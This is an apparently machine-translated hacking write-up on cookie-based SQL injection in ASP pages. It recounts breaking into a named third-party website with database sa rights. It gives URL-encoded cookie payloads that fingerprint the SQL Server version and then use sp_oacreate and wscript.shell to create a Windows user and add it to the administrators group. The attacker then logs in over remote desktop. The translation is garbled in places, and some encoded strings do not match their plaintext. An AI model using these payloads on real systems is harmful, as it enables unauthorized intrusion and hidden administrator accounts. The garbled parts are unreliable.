Alternative injection attacks-cookie Injection

 

I. Target locking
On MSN, a friend icerover sent a message asking me some questions about cookie injection. At that time, I read the code of the ant cinema system and found its chageusr. asp. the cookie injection vulnerability exists. Here we will briefly analyze its code:

================================ Code ========================== ========

================================ Code ========================== ========
Through the above brief analysis, we can know that userid and password are not filtered. userid and password are all from the client's cookie, so we only need to construct the injection statement in the client's cookie to inject.
How to use it is not described here, which will be mentioned below.
My friend told me that there is a cookie injection vulnerability in its member. asp Website www.chinaxxx.net. Its permission is sa.
2. Penetration
The code for member. asp is as follows:
================================ Code ========================== ========

 

================================ Code ========================== ========
Use the above Code Userid = Request. cookies ("Userid") and so on. We can know that the userid and email value are the Cookies of the client, and then we can find that the Cookies are not filtered,
StrQ = "select * from tb_users where usertype> 0 and email =" & Email & "and Userid =" & Userid
Directly query, so we only need to construct the correct statement in the cookie to fix this site. The sa permission allows us .... Hey
Iii. Notes on cookie Injection
1 .; symbol. In cookies, variables are differentiated by commas, so do not include them in your injection statement. If you include them, it may cause an error in your injection statement.
2. space characters. In cookies, spaces are automatically filtered out. Therefore, you must note the conversion in your injection statement.
The point of attention is almost the same. Now let's start our injection journey.
4. my note, my note, and my note
Its member. asp needs to be logged on. Its cookie after login is as follows:
Userid = 5581; email = icerover % 40msn % 2 Ecom; ASPSESSIONIDASARRRTT = OMOIFPICADICDLAMAKOGCNNH
Change the location to facilitate Injection
Email = icerover % 40msn % 2 Ecom; ASPSESSIONIDASARRRTT = OMOIFPICADICDLAMAKOGCNNH; Userid = 5581;

Check the version:
Decode and 1 = (select @ version); -- the conversion is as follows:
% 20% 61% 6E % 64% 20% 31% 3D % 28% 73% 65% 6C % 65% 63% 74% 20% 40% 40% 76% 65% 72% 73% 6F % 6E % 69% 3B % 2D % 2D
The entire cookie is converted
Email = icerover % 40msn % 2 Ecom; ASPSESSIONIDASARRRTT = OMOIFPICADICDLAMAKOGCNNH; userid = 5581% 20% 61% 6E % 64% 20% 31% 3D % 28% 73% 65% 6C % 65% 63% 74% 20% 40% 40% 76% 65% 72% 73% 6F % 6E % 69% 3B % 2D % 2D
;
Get Echo 1:

 
Scan the port and find that 3389 is enabled. Add a user directly and inject the following:
Conversion statement:
; Declare @ s varchar (21) set @ s = wscript. shelldeclare @ o int exec sp_oacreate @ s, @ o out exec sp_oamethod @o,run,NULL,net.exe user linzi linzihk/add; exec sp_oamethod implements localgroup administrators linzi/add ;--
As follows:
% 3B % 64% 65% 63% 6C % 61% 72% 65% 20% 40% 73% 20% 76% 61% 72% 63% 68% 61% 72% 28% 32% 31% 29% 20% 73% 65% 74% 20% 3D % 40% 73% 27% 77% 73% 63% 69% 70% 74% 2E % 73% 68% 65% 6C % 6C % 27% 64% 65% 6C % 63% 61% 72% 65% 20% 40% 6F % 20% 6E % 69% 74% 20% 65% 78% 65% 63% 20% 5F % 6F % 61% 63% 72% 65% 61% 74% 65% 20% 40% 73% 2C % 40% 6F % 20% 6F % 75% 74% 20% 65% 78% 65% 63% 20% 5F % 6F % 73% 6D % 70% 61% 65% 6F % 64% 20% 40% 6F % 2C % 27% 72% 75% 6E % 27% 2C % 4E % 55% 4C % 4C % 2C % 27% 6E % 65% 2E % 74% 65% 78% 65% 20% 75% 73% 72% 20% 78% 69% 61% 6F % 6C % 75% 20% 6C % 69% 6E % 7A % 69% 6B % 68% 2F % 20% 61% 64% 64% 3B % 27% 65% 78% 65% 63% 20% 5F % 6F % 61% 6D % 65% 74% 68% 6F % 64% 20% 40% 6F % 2C % 27% 72% 75% 6E % 27% 2C % 4E % 55% 4C % 4C % 2C % 27% 6E % 65% 2E % 65% 78% 65% 20% 6C % 6F % 63% 61% 6C % 67% 6F % 72% 75% 70% 20% 61% 6D % 64% 6E % 69% 69% 73% 74% 72% 6F % 61% 74% 72% 73% 20% 78% 69% 61% 6F % 6C % 75% 20% 2F % 61% 64% 64% 27% 3B % 2D % 2D
Modify the cookie as follows:
Email = icerover % 40msn % 2 Ecom; ASPSESSIONIDASARRRTT = OMOIFPICADICDLAMAKOGCNNH; userid = 5581% 3B % 64% 65% 63% 6C % 61% 72% 65% 20% 40% 73% 20% 76% 61% 72% 63% 68% 61% 72% 28% 32% 31% 29% 20% 73% 65% 74% 20% 3D % 40% 73% 27% 63% 72% 69% 70% 74% 2E % 73% 68% 65% 6C % 6C % 27% 64% 65% 63% 6C % 61% 72% 65% 20% 40% 6F % 20% 6E % 69% 74% 20% 65% 78% 65% 63% 20% 73% 70% 5F % 6F % 61% 63% 72% 65% 61% 74% 65% 20% 40% 2C % 73% 6F % 40% 6F % 20% 75% 74% 20% 65% 78% 65% 63% 20% 5F % 6F % 73% 6D % 70% 74% 68% 6F % 64% 20% 40% 6F % 2C % 27% 72% 75% 6E % 27% 2C % 4E % 55% 4C % 4C % 2C % 27% 6E % 65% 2E % 74% 65% 78% 65% 20% 73% 65% 72% 20% 78% 69% 61% 6F % 6C % 75% 20% 6C % 69% 6E % 7A % 69% 6B % 68% 2F % 20% 61% 64% 64% 3B % 27% 65% 78% 65% 63% 20% 73% 5F % 6F % 61% 6D % 65% 74% 68% 6F % 64% 20% 6F % 2C % 40% 27% 72% 6E % 75% 2C % 4E % 27% 4C % 4C % 2C % 55% 6E % 27% 74% 2E % 65% 78% 65% 20% 6C % 6F % 63% 61% 6C % 67% 72% 6F % 75% 70% 20% 61% 64% 6D % 69% 6E % 69% 73% 74% 72% 61% 6F % 74% 72% 78% 69% 61% 6F % 6C % 75% 20% 2F % 61% 64% 64% 3B % 2D % 2D;
Expected Echo 2 is displayed:

Although the dash is displayed, it has been successfully executed. with TS enabled, the dash can be directly mounted with the 3389 login device, bingo! Win the site.
V. Summary:
Speechless, let's get to know it !~~~